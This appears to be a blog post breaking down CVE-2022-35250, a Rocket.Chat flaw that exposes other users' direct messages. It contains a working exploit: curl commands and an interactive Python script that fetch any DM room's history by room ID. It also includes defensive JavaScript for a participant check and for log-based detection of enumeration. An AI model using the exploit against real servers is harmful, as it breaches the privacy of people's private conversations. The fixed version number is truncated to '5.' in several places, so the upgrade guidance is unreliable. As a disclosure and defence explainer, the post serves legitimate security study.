In mid-2022, security researchers discovered a serious flaw in Rocket.Chat, a popular open-source messaging platform used by millions of users. CVE-2022-35250 is a privilege escalation vulnerability that affects Rocket.Chat versions below 5.. Its impact is alarming: any authenticated user could obtain elevated permissions and view other users' private direct messages (DMs), even if they weren't authorized to do so. This post gives you an exclusive, easy-to-understand breakdown of the vulnerability, walks through how an exploit could work, and presents code snippets and references so you can learn more or defend your organization.

What is Rocket.Chat?

Rocket.Chat is a team collaboration platform offering similar functionality to Slack or Microsoft Teams. Many organizations deploy it privately to keep their internal communications confidential. Among its features are public channels, private groups, and, crucially, direct messages (DMs), which are supposed to be visible only to the sender and recipient.

About CVE-2022-35250

- CVE ID: CVE-2022-35250

Official Description

> Rocket.Chat prior to version 5. allows any authenticated user to elevate their permissions and access direct messages they do not have permission to view.

Source: GitHub Advisory GHSA-wr7g-g2pf-vmg2

How Does the Vulnerability Work?

Rocket.Chat uses a REST API for all major operations. Usually, to read a DM, you must be a participant. However, CVE-2022-35250 stems from insufficient validation on DM access endpoints. With an authenticated account, a user can manipulate API requests to access conversations they're not part of.

The problem: The backend API was failing to check if the requesting user belonged to the DM room whose messages they wanted to view.

Step 1: Authentication

First, an attacker logs in normally as a low-privileged user and gets an auth token.

curl -s -X POST https://your.rocket.chat/api/v1/login \
     -d 'user=attacker&password=weakpassword'

This gives them a response containing authToken and userId.

Step 2: Find Direct Message Room IDs

The attacker needs a DM room ID between two other users (e.g., user1 and user2). These can sometimes be guessed, found via insecure directory listing, or inferred with API calls if directory privacy isn’t enforced.

A savvy attacker could try enumeration if APIs aren’t properly locked down.

Step 3: Fetch Messages from Arbitrary DM

The attacker crafts an API request to the endpoint intended for fetching messages from a direct message room.

curl -X GET 'https://your.rocket.chat/api/v1/im.messages?roomId=ROOM_ID' \
     -H 'X-Auth-Token: [authToken]' \
     -H 'X-User-Id: [userId]'

If the system is vulnerable (i.e., Rocket.Chat < 5.) and doesn’t check if userId is a participant in ROOM_ID, it returns the message history.
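To make the missing check concrete, here is an added illustration (not Rocket.Chat's code and not the text of the upstream fix) of a minimal DM-history handler in the shape the post describes: one version that only verifies the room is a DM, and one that also verifies the requester is a participant before returning history. The in-memory rooms, users and messages are constructed for the demo; the `t: 'd'` room-type flag and `uids` member list loosely mirror Rocket.Chat's room documents but are assumptions here.

```javascript
// Added example: a DM-history endpoint with and without the participant check.
// All data below is constructed for this demo; nothing is read from a real server.

const rooms = {
  DMroom1: { _id: 'DMroom1', t: 'd', uids: ['alice', 'bob'] },   // DM between alice and bob
  GENERAL: { _id: 'GENERAL', t: 'c', uids: [] },                  // public channel, not a DM
};

const messages = {
  DMroom1: [
    { rid: 'DMroom1', u: 'alice', msg: 'salary numbers attached' },
    { rid: 'DMroom1', u: 'bob', msg: 'thanks, keep this between us' },
  ],
  GENERAL: [{ rid: 'GENERAL', u: 'carol', msg: 'hello everyone' }],
};

// Error carrying an HTTP-style status so callers can map it to a response.
class ApiError extends Error {
  constructor(status, message) {
    super(message);
    this.status = status;
  }
}

function loadDmRoom(roomId) {
  const room = rooms[roomId];
  if (!room || room.t !== 'd') throw new ApiError(400, 'not a direct message room');
  return room;
}

// Vulnerable shape: validates that the room exists and is a DM, then returns
// the history to ANY authenticated caller. The requester is never consulted.
function imMessagesVulnerable(roomId, requesterId) {
  loadDmRoom(roomId);
  return messages[roomId] || [];
}

// The check that was missing: is the requester one of the DM participants?
function isDmMember(room, userId) {
  return Array.isArray(room.uids) && room.uids.includes(userId);
}

// Fixed shape: same validation, plus the participant check before any data leaves.
function imMessagesFixed(roomId, requesterId) {
  const room = loadDmRoom(roomId);
  if (!isDmMember(room, requesterId)) throw new ApiError(403, 'unauthorized');
  return messages[roomId] || [];
}

// Runs a handler and reports the HTTP-style outcome (200 on success).
function statusOf(handler, roomId, requesterId) {
  try {
    handler(roomId, requesterId);
    return 200;
  } catch (e) {
    return e instanceof ApiError ? e.status : 500;
  }
}

// Stand-alone demo: mallory is not a participant of DMroom1.
console.log('vulnerable:', statusOf(imMessagesVulnerable, 'DMroom1', 'mallory')); // 200, history leaks
console.log('fixed:     ', statusOf(imMessagesFixed, 'DMroom1', 'mallory'));      // 403
console.log('member:    ', statusOf(imMessagesFixed, 'DMroom1', 'alice'));        // 200
```

The design point is that the membership test has to run inside the endpoint that returns data, not only in the client or in a separate "list my rooms" call: once a room ID is known by any means, the server is the only place the authorization decision can be enforced.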

Here's some simple Python code that fetches the message history of a given DM room ID:

import requests

HOST = 'https://your.rocket.chat'
TOKEN = 'YOUR_AUTH_TOKEN'   # authToken from the login response
USER_ID = 'YOUR_USER_ID'    # userId from the login response

room_id = input("Enter DM room ID: ")

# Rocket.Chat's REST API authenticates with these two headers.
headers = {
    'X-Auth-Token': TOKEN,
    'X-User-Id': USER_ID
}

# im.messages returns the history of a direct message room.
url = f"{HOST}/api/v1/im.messages?roomId={room_id}"
resp = requests.get(url, headers=headers)
print(resp.status_code)
print(resp.json())

This code requests the message history for whichever room ID you enter. If Rocket.Chat is not patched, the DM is returned even though the requesting user is not a participant.
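From the defender's side, the pattern above leaves a footprint: a single account pulling im.messages history for many distinct room IDs in a short window. The following is an added detection example, not part of the original post, that parses access-log lines and flags such accounts. The log line format and the sample lines are constructed for this demo; adapt the regular expression to the format your reverse proxy or Rocket.Chat instance actually writes.

```javascript
// Added example: flag accounts that read im.messages for many distinct room IDs.
// SAMPLE_LOG is constructed for this demo in a simple "<ts> uid=<id> <method> <path> <status>" shape.

const SAMPLE_LOG = [
  '2022-09-20T10:00:01Z uid=alice GET /api/v1/im.messages?roomId=DMroom1&count=50 200',
  '2022-09-20T10:00:02Z uid=bob GET /api/v1/channels.messages?roomId=GENERAL 200',
  '2022-09-20T10:00:03Z uid=mallory GET /api/v1/im.messages?roomId=DMroom1 200',
  '2022-09-20T10:00:04Z uid=mallory GET /api/v1/im.messages?roomId=DMroom2 200',
  '2022-09-20T10:00:05Z uid=mallory GET /api/v1/im.messages?roomId=DMroom3 400',
  '2022-09-20T10:00:06Z uid=mallory GET /api/v1/im.messages?roomId=DMroom4 200',
  '2022-09-20T10:00:07Z uid=alice GET /api/v1/im.messages?roomId=DMroom1 200',
];

// Only im.messages requests matter here; other endpoints are ignored by the regex.
const LINE_RE = /^(\S+) uid=(\S+) (GET|POST) \/api\/v1\/im\.messages\?(\S*) (\d{3})$/;

// Returns { ts, uid, roomId, status } for an im.messages line, or null otherwise.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const params = new URLSearchParams(m[4]);
  return { ts: m[1], uid: m[2], roomId: params.get('roomId'), status: Number(m[5]) };
}

// Per-user summary: distinct rooms requested (successful or not, since failed
// probes are part of the same behaviour) and number of successful reads.
function summarize(lines) {
  const perUser = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec || !rec.roomId) continue;
    if (!perUser.has(rec.uid)) perUser.set(rec.uid, { rooms: new Set(), okReads: 0 });
    const entry = perUser.get(rec.uid);
    entry.rooms.add(rec.roomId);
    if (rec.status === 200) entry.okReads += 1;
  }
  return perUser;
}

// Users whose distinct im.messages room count reaches the threshold, most active first.
function findEnumerators(lines, threshold = 3) {
  const flagged = [];
  for (const [uid, entry] of summarize(lines)) {
    if (entry.rooms.size >= threshold) {
      flagged.push({ uid, distinctRooms: entry.rooms.size, okReads: entry.okReads });
    }
  }
  return flagged.sort((a, b) => b.distinctRooms - a.distinctRooms);
}

// Stand-alone demo over the constructed log.
console.log(findEnumerators(SAMPLE_LOG, 3)); // [ { uid: 'mallory', distinctRooms: 4, okReads: 3 } ]
```

A threshold of three distinct DM rooms is a demo value; in practice, baseline how many DM rooms a normal user touches per hour on your deployment, and treat a burst of 400 responses from im.messages as the stronger signal, since legitimate clients rarely ask for rooms that do not exist.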

- Privacy breach: Users trust DMs for sensitive or private chats.
- Internal leaks: Business secrets or personal data can be stolen by anyone with a regular user account.

Fix and Recommendations

- Upgrade immediately to Rocket.Chat version 5. or later. (Download latest release)
- Review and limit user account creation policies.

The Rocket.Chat team patched this in PR #26982.

References and Further Reading

- National Vulnerability Database entry (CVE-2022-35250)
- GitHub Security Advisory
- Rocket.Chat Release Notes
- Mitre CVE details

Conclusion

CVE-2022-35250 is a textbook example of a faulty access control check with serious consequences. If your organization uses Rocket.Chat, upgrading to the latest version is not optional—it’s urgent. Even if you didn’t use DMs much, any data exposure can spell trouble. Always keep your collaboration tools up to date and audit API endpoints for proper access control. Protect your messages, protect your people.

If you want more tech breakdowns like this, follow Rocket.Chat's security advisories and keep learning!


*Disclaimer: This post is for educational and defensive purposes only. Do not use this information to attack systems you do not own or have permission to test.*

Timeline

Published on: 09/23/2022 19:15:00 UTC
Last modified on: 09/27/2022 14:01:00 UTC